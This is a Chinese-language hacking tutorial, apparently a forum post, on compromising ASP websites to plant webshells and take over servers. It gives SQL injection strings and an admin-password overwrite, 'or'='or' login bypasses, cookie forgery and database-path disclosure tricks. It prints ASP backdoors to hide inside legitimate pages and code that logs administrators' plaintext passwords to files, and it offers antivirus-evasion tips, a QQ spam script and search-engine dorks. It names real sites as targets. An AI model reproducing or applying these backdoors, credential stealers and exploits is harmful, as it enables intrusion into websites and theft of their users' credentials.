由于asp系统在互联网上广泛的应用，针对asp系统的脚本攻击最近闹得是红红火火。在这些攻击中，[br][br]攻击者多是利用注入、暴库、旁注、cookies欺骗等手段获取管理员的权限，[br][br] 通过直接上传或后台备份等各种入侵手法[br][br] 取得网站webshell继而控制整个站点[br][br] 接着通过webshell提升权限获取服务器管理权限。[br][br] 什么是webshell？webshell就是一个相应脚本语言编写成的，具有在线编辑、删除、新增文件、执行[br][br]程序及sql语句等功能的脚本文件，具有随意更改目标首页,删除文件等权限.[br][br] 如著名的老兵以及海洋顶端等就是这样一个asp脚本文件,我们俗称大马以及小马等.[br][br][br]-------------------------------------------------- [br][br]二:主要的入侵手段[br][br][br] 1.上传漏洞[br][br] 一:如典型的动网上传漏洞,我们直接访问上传页面。[br][br] 二:进入网站后台直接上传脚本木马,获得webshell.[br][br] 因为有些网站系统对管理员十分信任.进入后台后,只要找到上传地点.就能任意上传脚本木马.[br][br] 三:添加上传类型.[br] [br] 如果系统代码限定了不允许上传asp文件,那么我们可添加允许上传asa cer等文件.然后将脚本木马[br][br] 后缀名相应的修改成asa cer.webshell一样可以使用。[br][br][br] 四:通过后台备份功能恢复asp后缀名[br][br] 如果无法上传asp.asa.cer等后缀名文件。我们修改脚本木马后缀名asp为jpg或者gif图片后缀名[br][br] 上传成功后.通过后台备份数据库功能恢复文件asp后缀名.[br][br] 五:抓包上传[br][br] 通过抓取上传真实地址以及管理员认证数据cookies.[br][br] 然后通过明小子上传脚本木马.获得webshell.[br][br][br] 其实上传方法还有很多.不过.也都是在基础上发展而来.只要我掌握了知识.学习方法就十分的简单[br][br][br] [br]2.注入漏洞[br][br] 在众多针对脚本系统的攻击中，注入可谓是闹得最红火的攻击手段了.[br][br] 目前引起sql注入的原因主要是程序员在编写帐脚本程序时对特殊字符过滤的不完全引起的.[br][br][br] 比如一个网址 [color=#0070af]http://xxx.com/asp?id=1[/color] [br][br] 是以id=数字形式结尾网址 我们通过 网址后加上个 and 1=1 和 and 1=2 分别访问[br][br] 如果加上and 1=1 显示正常页面 加上 and 1=2 显示出错 返回错误页面 [br][br] 则表示存在注入漏洞[br][br] 那么一个网址存在注入漏洞我们怎么去利用呢?[br][br] 首先可以使用工具.[br][br] 比如明小子.阿d注入工具.猜解帐号以及密码等重要信息.[br][br] 对于sql数据库如果无法破解猜解出来的md5加密密码[br][br] 那么我们可以用以下命令: [br][br] http://注入网址;update admin set password='新md5密码' where password='旧md5密码'-- [br][br][admin为表名.] [br][br] 更改管理员密码[br][br] 3.cookie诈骗[br][br] cookie是什么呢?[br][br] cookie是你上网时由网站所为你发送的值记录了你的一些资料，比如ip，姓名密码等。[br][br] 怎样诈骗呢？[br][br] 如果我们现在已经知道了xx站管理员的站号和md5密码了 但是破解 不出来密码 （md5是加密后的一[br][br]个16位的密码）[br][br] 我们就可以用cookie诈骗来实现，把自己的id修改成管理员的，md5密码也修改成他的，通过工具[br][br]修改cookie 这样就答到了cookie诈骗的目的，系统就会认定你就是管理员。[br][br][br] 4.旁注[br][br] 如果你的网站有难度.那么我们就入侵与你同一台虚拟机的网站,通过入侵别人的网站[br][br] 拿到系统权限 也就能控制你的网站[br][br] 很多网站是存放在同一个虚拟机上的，也许某一台虚拟机上有几百个网站.那么我们只需要入侵[br][br] 入侵其中第一个.从而控制全部的网站.就是这么简单![br][br][br] 5.暴库[br][br] 一般而言，我们要获取一个站点的shell，必须先获得对方的后台管理权限，要获得对方的管理权限[br]当然先要得到对方的管理员用户以及密码！得到对方管理员用户各种密码的方法有很多.[br][br] 通过下载数据库后继而破解md5加密信息.从而获得管理员账号.[br][br] 但是一个网站的数据库当然不会让你随意下载到.[br][br] 那么我们怎么去找数据库地址呢?[br][br] 最简单的就是暴库了.[br][br] 通过服务器返回的错误信息提示暴出数据库地址的。[br][br] 但是,这漏洞并不见,毕竟直接暴露出系统的数据库.这是多么危险的事情呢![br][br] 暴库方法:比如一个站的地址为 [br][br][color=#0070af]http://xxx.com/xxx.asp?id=1&id=2[/color] [br][br] 我们将com/dispbbs中间的/换成%5c 如果存在暴库漏洞[br][br] 既可直接暴露出数据库的绝对路径 使用工具 迅雷等下载即可[br][br] 还有利用默认的数据库路径 [color=#0070af]http://xxx.com/[/color] 后面加上 conn.asp 如果没有修改默认[br][br] 的数据库路径也可以得到数据库的路径（注意：这里的/也要换成%5c） [br][br] 那么暴库的目的就是为了下载数据库得到管理员账号后上传木马脚本[br][br][br] 6.默认漏洞[br][br] 同一个网站系统或许有成千上万的网站在使用这套系统[br][br] 而每一套网站系统，当然有它最初默认的安装路径以及账号密码等[br][br] 我们通过大批量的搜索使用这套网站系统几百万个网站[br][br] 找到那些没有修改默认设置的网站，没有修改管理账号，没有修改后台登陆地址，没有修改数据库存[br]放地址的目标[br][br] 进行入侵！[br][br]-------------------------------------------------- [br][br] 看完上面的介绍 基于根本.所谓的入侵也就利用这些常见的微乎其微的小漏洞.[br][br] 并没有什么惊天动地的 没有什么所谓黑客 可以一下子没有任何基础原理和方法[br][br] 去入侵某个网站或服务器 [br][br] 那么我们是怎么入侵的? 无非的懂的多。知道的多.[br][br] 我们无非是比管理员更渴望知道.服务器.哪些地方不安全.哪些地方可以被我们所利用[br][br] 我们无非是比管理员更关心最新的系统漏洞[br][br] 我们无非是比管理员更勤劳的寻找系统的漏洞[br][br] 那么其实,只要我们通过学习实践操作掌握了这些基础的知识.[br][br] 所谓的入侵其实也就很简单.[br][br] 所以希望大家.学成以后.不要自以为是.[br][br] 不过就是些小漏洞,无非也就是管理员的疏忽,这又能怎样?[br][br] 其实我们懂的还太少.连电脑也是由美国的华德·爱肯所发明[br][br] 在我们看天书一般的英文代码时.美国人就像看小说一样能明白代码的意思[br][br] 试问 [br][br] 这是天与地的差距吗?[br][br] 或许,这完全是心灵上的差别.[br]--------------------------------------------------[br][br]三:漏洞利用[br][br] 入侵指定的目标，如何去入侵呢？[br][br] 方法非常简单，我们寻找以上的基本漏洞[br][br] 只要存在这些漏洞，我们就发起攻击[br][br] 为大家介绍一些这些漏洞的利用方法，也就是，找到这些漏洞，我们是为了干什么！[br][br][br]1.上传漏洞[br][br]上传漏洞利用非常简单[br][br]就是从这个上传漏洞，直接上传我们的脚本木马，从而拿到webshell。继而控制目标网站。[br][br]2.注入漏洞[br][br]注入漏洞分两种不同类型access数据库与mssql数据库[br][br]首先，直接利用方法是，猜解管理员账号以及密码。[br][br]然后网站登陆后台，从网站的后台找到上传点。从上传点，上传脚本木马。继而控制目标网站。[br][br][br]那么mssql数据库。还可以猜解网站存放在服务器中的根目录，通过差异备份[br][br]备份出一句话，然后通过一句话木马客户端，上传脚本木马,从而控制目标网站。[br][br][br]3.cookie诈骗[br][br]在得到目标网站管理员md5加密后的密码，我们无法短时间破解出md5解密后的密码[br][br]怎么办呢？[br][br]我们直接通过 修改cookie相关信息[br][br]也就是把管理的账号，id，md5加密的密码。修改到相应的位置[br][br]这样再登陆，系统就认为我们就是管理员。[br][br]从而我们拥有了管理员的权限，[br][br]这个时候，我们就登陆后台。找到上传点。上传脚本木马。继而控制目标网站。[br][br][br]4.旁注[br][br]旁注，非常有意思。[br][br]简单的来说，网站的服务器，他是存放在特殊的地方，或者这么说。不是私人人经营的[br][br]是由企业代为管理。[br][br]那么企业当然不可能只管理你一个网站。[br][br]所以，一台虚拟机，可能有上百个网站，同时存放在这台虚拟机上。[br][br]那么，我们试想，是不是通过入侵这台虚拟机，就达到控制这一百个网站的目的呢？[br][br]所以呀。就是这么简单。不管我们入侵这一百个网站中哪一个！[br][br]只要我们达到入侵并控制了这台网站服务器的目的。[br][br]我们就达到了控制这台服务器一百个网站的目的[br][br] [br]5.暴库[br][br]我们利用暴库这个漏洞是为了什么呢？[br][br]顾名思义呀。暴库就是暴出目标的数据库地址[br][br]想到这里大家都会笑了吧[br][br]我懂了。暴了数据库地址[br][br]当然是下载他的数据库[br][br]然后通过数据库得到管理员账号[br][br]通过管理员账号，进入后台，接着找上传点，接着上传脚本木马，接着呢？[br][br]当然就是深入的控制目标网站的服务器。[br][br][br]6.默认漏洞[br][br]默认漏洞，这个就笑呢[br][br]低级错误嘛。但是却广泛的存在于网络中[br][br]怎么利用呢？[br][br]默认数据库，我们就利用得到管理账号入侵。[br][br]默认管理员账号。我们就通过登陆后台入侵 [p]就是这么简单。[/p] [p][/p] [p][/p] [p][/p] [p][/p] [p][/p] [p][/p] [p][/p] [p][br]它和其他asp程序没有本质区别，只要是能运行asp的空间就能运行它，这种性质使得asp木马非常不易被发觉。它和其他asp程序的区别只在于asp木马是入侵者上传到目标空间，并帮助入侵者控制目标空间的asp程序。[/p] [p]关于制作..[/p] [p]建一个asp文件，内容为 [br]找一个正常图片ating.jpg，插入一句话木马（比如冰狐的）,用ultraedit进行hex编译，插入图片里，为了运行成功，还要搜索%和％,将其变为00,(不要替换自己asp的),再把jpg文件开头加入[/p] [p] [br]2. 名称：整蛊网吧[/p] [p]先用精锐网吧辅助工具得到用户名和密码，然后用计算机管理联结一台机器，开telnet,连接，开共享，复制一个木马过去运行即可。 3．名称：感受md5暴力破解的魅力[/p] [p]rainbowcrack用法先用rtgen生成库 "rtgen md5 byte 1 7 5 2400 40000 all"[/p] [p]1和7代表密码最小和最大长度[/p] [p]阿汀我再加个方法：[color=#355e9e]http://md5.rednoize.com/[/color] 在线破解[/p] [p]或者到[color=#355e9e]http://md5lookup.com/?category=01-3&searck=on[/color][/p] [p][br]4.很多时候我们做免杀木马，不用懂汇编，用北斗加壳程序就能逃杀，还有很多加壳软件，大家木马加壳的时候最好多选择不知名的加壳软件。[/p] [p][br]5．名称：隐蔽的插入型asp木马[/p] [p](1)在我们要做手脚的asp文件里加入如下内容[/p] [p]<%if request("action")="ok" then%> [br]shell代码插在这里，最好是小马，还要加密一下 <%end if%> [br]访问的时候在你作手脚的asp文件后面加上?action=ok,即可[/p] [p](2)另一种方法，在我们要做手脚的asp文件里加入如下内容[/p] [p]<% [br]on error resume next [br]strfilename = request.querystring("filer") [br]set objstream = server.createobject("abodb.stream") [br]objstream.type = 1 [br]objstream.open [br]objstream.loadfromfile strfilename [br]objstream.savetofile server.mappath("ating.asp"),2 [br]%> [br]访问的时候在做手脚的asp文件后面加上?filer=xxx[/p] [p]xxx为你本地上传的一个路径如 c:ating123.asp[/p] [p]上传后在做手脚的asp的同文件夹中有ating,asp[/p] [p][br]（3）前提得到system权限，进入网站目录下一层[/p] [p]mkdir s…[/p] [p]copy ating.asp s…/[/p] [p]这样杀毒软件找不到的[/p] [p]访问http://网站/s…/ating.asp即可。[/p] [p][br]6. 工具[color=#355e9e]http://hack520.tengyi.cn/chaojiyonghu.rar[/color]，此工具在该电脑生成一个超级用户[/p] [p]用户名为：hack 密码110，在dos下和计算机管理器上看不到你建立的用户，并且是删除不掉的。[/p] [p]7．名称：qq群脚本攻击[/p] [p]打开qq对话诓，复制消息，然后，下面的内容保存为.vbs 文件，运行即可。[/p] [p][/p] [p]set wshshell= wscript.createobject("wscript.shell") [br]wshshell.appactivate "qq信息攻击脚本" [br]for i=1 to 20 [br]wscript.sleep 1000 [br]wshshell.sendkeys"^v" [br]wshshell.sendkeys i [br]wshshell.sendkeys "%s" [br]next[/p] [p][/p] [p]8．搜索：程序制作：万鹏 有免费申请空间的，直接上传asp马即可。[/p] [p][br]9. 名称：全面找出你站上的asp木马[/p] [p]（1） 用杀毒软件[/p] [p]（2） 用ftp客户端软件，点"工具"->"比较文件夹"[/p] [p]（3） 用asplist2.0.asp上传到站点空间查看，一般功能多的asp我估计就是asp木马[/p] [p]（4） 用工具beyond compare[/p] [p][br]10名称：拓展思路拿dvbbs帐号 "一个人的圣经"的动画[/p] [p][br]（1）以前获得webshell后想进入dvbbs的后台,想要管理员的密码，可以这样，[/p] [p]老办法:[/p] [p]修改admin_login.asp得到明文dvbbs后台密码[/p] [p]在"username=trim(replace(request("username")这行后面[/p] [p][/p] [p]dim fsoobject [br]dim tsobject [br]set fsoobject = server.createobject("scripting.filesystemobject") [br]set tsobject = fsoobject.createtextfile(server.mappath("laner.txt")) [br]tsobject.write cstr(request("password")) [br]set fsoobject = nothing [br]set tsobject = nothing[/p] [p][/p] [p]只要管理员登陆后台，在目录下就生成了laner.txt。[/p] [p][br]（2）login.asp中case "login_chk"下:[/p] [p][/p] [p]on error resume next [br]dim rain [br]set rain=server.createobject("adodb.stream") [br]rain.type=2 [br]rain.charset="gb2312" [br]rain.position=rain.size [br]rain.open [br]rain.loadfromfile server.mappath("laner.asp") [br]rain.writetext now&request("username")&"text:"&request("password")&chr(10) [br]rain.savetofile server.mappath("laner.asp"),2 [br]rain.close [br]set rain=nothing[/p] [p][/p] [p]这样laner.asp将获得全部登陆人的登陆时间，用户名和密码。[/p] [p][br]（3）如果你有自己的网站或者另外的webshell(强烈建议使用): 可以建立目录laner,在里面建立一个空的laner.asp和如下代码的rain.asp:[/p] [p][/p] [p]<%if request("n")<>"" and request("p")<>"" then [br]on error resume next [br]dim rain [br]set rain=server.createobject("adodb.stream") [br]rain.type=2 [br]rain.charset="gb2312" [br]rain.position=rain.size [br]rain.open [br]rain.loadfromfile server.mappath("laner.asp") [br]rain.writetext now&"name:"&request("n")&"password:"&request("p")&chr(10) [br]rain.savetofile server.mappath("laner.asp"),2 [br]rain.close [br]set rain=nothing [br]end if%>[/p] [p][/p] [p]11. 名称：利用qq在线状态抓鸽子肉鸡[/p] [p]生成qq在线状态，把里面的地址改成木马地址，发到论坛在login.asp那里插入一句:[/p] [p][/p] [p]response.write""response.write""[/p] [p][/p] [p]结果所有登陆人都会乖乖的把名字和密码送到你的laner.asp 里[/p] [p][br]12. 动画名称：媒体中国整站程序存在多处漏洞[/p] [p]漏洞程序:媒体中国整站程序(第一版)[/p] [p]官方网站:http://meiti.elgod.com/[/p] [p]漏洞: %5c(暴库) 上传 注入[/p] [p]上传页面:down1/upload.asp[/p] [p][br]13. 名称：免费电话＋msh命令行工具[/p] [p][color=#355e9e]http://globe7.com/[/color] 打开主页，点击坐下角，free download，下载到本地，安装，运行后，会提示正在寻找你所在地区的区号。由于是国际长途，注册一个帐号，送100美分，国内计时0.01/分，你就有100分钟可以白打。是一个帐号哦。[/p] [p]要注意的就是，固定电话，小灵通 形式为0086521123456 521本来时0521，要省略前面的零，手机号也是一样。[/p] [p][br]14. 名称：bo-blog的新漏洞[/p] [p]http://网址/index.php?job=../admin/ban[/p] [p]把其中"禁止搜索的词"那部分另存出来，里面的地址改完整，插入一句话木马[/p] [p]15. 名称：钩魂者入侵传奇私服[/p] [p]用百度 搜索 传奇 inurl:tuku[/p] [p]或者 传奇 inurl:wplm.htm[/p] [p]再或者 传奇 inurl:coolsites.asp[/p] [p]友情链接里插入一句话木马即可[/p] [p][br]16. 程序: 宏达企业整站上传漏洞[/p] [p]官方主页:http://mu126.com/[/p] [p]漏洞页面:/cx/upfile.asp (上传漏洞)[/p] [p][br]17．无间盗邮箱，在修改密码里，用户名和密码里添or=or[/p] [p][br]18．名称： bbsxp5.16后台得到webshell[/p] [p]bbsxp5.16过滤了 asp,asp,cdx,cer,扩展名的文件上传，就是在基本设置上添加上上传类型也不行，并禁止了修改数据备份数据名称，我们可以把此网页保存在本地，改源代码上传。[/p] [p][br]19．名称：jhackj 2005年最新精典教程[/p] [p]下载看看吧，不错，各大网站都有[/p] [p][br]20．名称：省力入侵韩国肉鸡[/p] [p]在啊d的扫描注入点项，打开这个：[color=#355e9e]http://google.co.kr/advanced_search?hl=zh-cn[/color][/p] [p]这是高级搜索项，关键字随便写。这里我写asp?name= 设置为每页显示100条。[/p] [p]语种选择韩文。搜索，很多sa.[/p] [p][br]21．名称：任何网吧的管理系统破解[/p] [p]选智能abc，然后vv输入，光标后退两步，按delete键 刚输入的两个vv删除, 最后按inter键。[/p] [p][br]22．名称：破解qq空间插入网页木马的代码[/p] [p]现在腾讯已经封了很多qq空间代码了，就如以前[/p] [p][br][/p] [p][/p] [p][br]插入网页木马的代码也早被封了，突破禁用的方法，代码如下：[/p] [p][/p] [p]

[/p] [p][/p] [p]最后附上总结的[/p] [p][br]1.上传漏洞[不多讲][/p] [p]ps: 如果看到:选择你要上传的文件 [重新上传]或者出现"请登陆后使用"，80%就有漏洞了！[/p] [p]有时上传不一定会成功,这是因为cookies不一样.我们就要用wsockexpert取得cookies.再用domain上传.[/p] [p][br]2.注入漏洞[不多讲][/p] [p]ps:对md5密码.有时我们不是哪么容易跑出来.如果是[sql数据库].那么我们可以用以下命令:[/p] [p]http://注入网址;update admin set password=\新md5密码\ where password=\旧md5密码\-- [admin为表名.][/p] [p][br]3.旁注,也就是跨站.[/p] [p]我们入侵某站时可能这个站坚固的无懈可击，我们可以找下和这个站同一服务器的站点，然后在利用这个站点用提权，嗅探等方法来入侵我们 要入侵的站点。，在这里有个难点，就是一些服务器的绝对路径经过加密，这就看我们的本事了[/p] [p][br]4.暴库:把二级目录中间的/换成%5c[/p] [p]ey:http://ahttc.edu.cn/otherweb/dz/bgs/bigclass.asp?bigclassname=职责范围&bigclasstype=1[/p] [p]如果你能看到：\e:ahttc040901otherwebdzdatabaseixuer_studio.asa\不是一个有效的路径。 确定路径名称拼写是否正确，以及是否 连接到文件存放的服务器。[/p] [p]这样的就是数据库了。下载时用flashget换成.mdb格式的就行.[/p] [p][br]5.\or\=\or\这是一个可以连接sql的语名句.可以直接进入后台。我收集了一下。类似的还有：[/p] [p]\or\\=\ " or "a"="a \) or (\a\=\a ") or ("a"="a or 1=1-- \ or \a\=\a[/p] [p][br]6.社会工程学。这个我们都知道吧。就是猜解。[/p] [p]ey：[color=#355e9e]http://neu.edu.cn/waishi/admin[/color][/p] [p]admin waishi[/p] [p][br]7.写入asp格式数据库。就是一句话木马[ ]，常用在留言本.[/p] [p]ey：[color=#355e9e]http://ahsdxy.ah.edu.cn/ebook/db/ebook.asp[/color][这个就是asp格式的数据库]，再写入一句话木马[/p] [p][br]8.源码利用：一些网站用的都是网上下载的源码.有的站长很菜.什么也不改.[/p] [p]ey:http://ahsdxy.ah.edu.cn/xiaoyoulu/index.asp[/p] [p]这个站用的是：杰出校友录，源码我下过了，[/p] [p]默认数据库/webshell路径：databaseliangu_data.mdb 后台管理：adm_login.asp 密码及用户名都是admin[/p] [p][br]9.默认数据库/webshell路径利用:这样的网站很多/利人别人的webshell.[/p] [p][/p] [p]/databackup/dvbbs7.mdb [br]/bbs/databackup/dvbbs7.mdb [br]/bbs/data/dvbbs7.mdb [br]/data/dvbbs7.mdb [br]/bbs/diy.asp [br]/diy.asp [br]/bbs/cmd.asp [br]/bbs/cmd.exe [br]/bbs/s-u.exe [br]/bbs/servu.exe[/p] [p][/p] [p]工具：网站猎手 挖掘鸡[/p] [p]ey：[color=#355e9e]http://cl1999.com/bbs/databackup/dvbbs7.mdb[/color][/p] [p][br]10.查看目录法:人一些网站可以断开目录，可以方问目录。[/p] [p]ey：[color=#355e9e]http://ujs168.com/shop/admin/[/color][/p] [p][color=#355e9e]http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/[/color][/p] [p]这样我们可以找到数据库，下载不用我教吧[/p] [p][br]11.工具溢出:.asp?newsid= /2j.asp?id=18 .asp?id=[这种方法可以取得大量的webshell][/p] [p][br]12.搜索引擎利用:[/p] [p](1).inurl:flasher_list.asp 默认数据库:database/flash.mdb 后台/manager/[/p] [p](2).找网站的管理后台地址:[/p] [p]site:xxxx.comintext:管理[/p] [p]site:xxxx.comintitle:管理 <关键字很多，自已找>[/p] [p]site:xxxx.cominurl:login[/p] [p](3).查找access的数据库,mssql、mysql的连接文件[/p] [p]allinurl:bbsdata[/p] [p]filetype:mdbinurl:database[/p] [p]filetype:incconn[/p] [p]inurl:datafiletype:mdb[/p] [p]我主不做了。。自已做做吧。。[/p] [p][br]13.cookie欺骗：[/p] [p]把自己的id修改成管理员的，md5密码也修改成他的，用桂林老兵工具可以修改cookie。这个我就不多讲了[/p]

该文章在 2010/7/14 1:47:04 编辑过